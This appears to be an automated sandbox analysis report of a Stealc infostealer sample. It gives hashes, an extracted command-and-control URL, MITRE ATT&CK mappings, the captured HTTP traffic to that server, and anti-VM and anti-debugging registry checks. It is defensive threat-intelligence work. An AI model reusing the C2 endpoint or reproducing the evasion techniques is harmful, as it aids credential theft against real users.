stealc | cf146510afc23e9c4b93dcbcf38a27bb75d2e0b22c2cf1106e69ef20177ebcd6

Analysis

max time kernel
14s
max time network
19s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
04/11/2024, 12:23 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

2.0MB
MD5

114d5e581b70ee44a460de6083f0ec55
SHA1

c7a450b65d7a567148d5f35ae575e102d6aba9bb
SHA256

cf146510afc23e9c4b93dcbcf38a27bb75d2e0b22c2cf1106e69ef20177ebcd6
SHA512

7cad59fc6562eafabefd641677f3d0991f7b185d8a1375d5a0142d13c71951be6baf688715ef97cd98a7cd0a4cd9a9091d4c0b9f718b6ef7a1e1548ebfb886f5
SSDEEP

49152:JPXIjJ0a0aYnxFxDUO/QK9scMsUl/veduXzoVEyZ:JPXIFV0aYhD9Wsozo/

Score

10^/10

stealc tale discovery evasion stealer

Malware Config

Extracted

Family

stealc

Botnet

tale

http://185.215.113.206

Attributes

url_path
/6c4adf523b719729.php

Signatures

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine	file.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2660	file.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2660	file.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2660

Network

GET

http://185.215.113.206/

file.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 04 Nov 2024 12:23:41 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 04 Nov 2024 12:23:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

file.exe

726 B
625 B
5
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

No results found

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2660-0-0x00000000002D0000-0x00000000009F2000-memory.dmp

Filesize
7.1MB

Download
memory/2660-1-0x00000000777B0000-0x00000000777B2000-memory.dmp

Filesize
8KB

Download
memory/2660-2-0x00000000002D1000-0x0000000000339000-memory.dmp

Filesize
416KB

Download
memory/2660-3-0x00000000002D0000-0x00000000009F2000-memory.dmp

Filesize
7.1MB

Download
memory/2660-5-0x00000000002D0000-0x00000000009F2000-memory.dmp

Filesize
7.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.